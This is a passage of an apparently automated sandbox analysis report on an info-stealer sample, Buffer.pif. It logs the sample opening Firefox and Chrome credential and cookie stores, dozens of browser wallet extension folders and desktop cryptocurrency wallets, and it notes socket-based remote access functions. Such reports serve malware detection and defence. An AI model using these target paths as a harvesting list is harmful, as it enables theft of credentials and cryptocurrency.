Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: EduSpark.pif Binary or memory string: WIN_81
Source: EduSpark.pif Binary or memory string: WIN_XP
Source: Buffer.pif.1.dr Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: EduSpark.pif Binary or memory string: WIN_XPe
Source: EduSpark.pif Binary or memory string: WIN_VISTA
Source: EduSpark.pif Binary or memory string: WIN_7
Source: EduSpark.pif Binary or memory string: WIN_8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Directory queried: C:\Users\user\Documents\ZSSZYEFYMU
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Directory queried: C:\Users\user\Documents\AFWAAFRXKO
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Directory queried: C:\Users\user\Documents\TQDGENUHWP
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Directory queried: C:\Users\user\Documents\NHPKIZUUSG
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: Yara match File source: 0000001A.00000003.2159848467.000000000176F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Buffer.pif PID: 2004, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: Process Memory Space: Buffer.pif PID: 2004, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004F2263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 18_2_004F2263
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004F1C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 18_2_004F1C61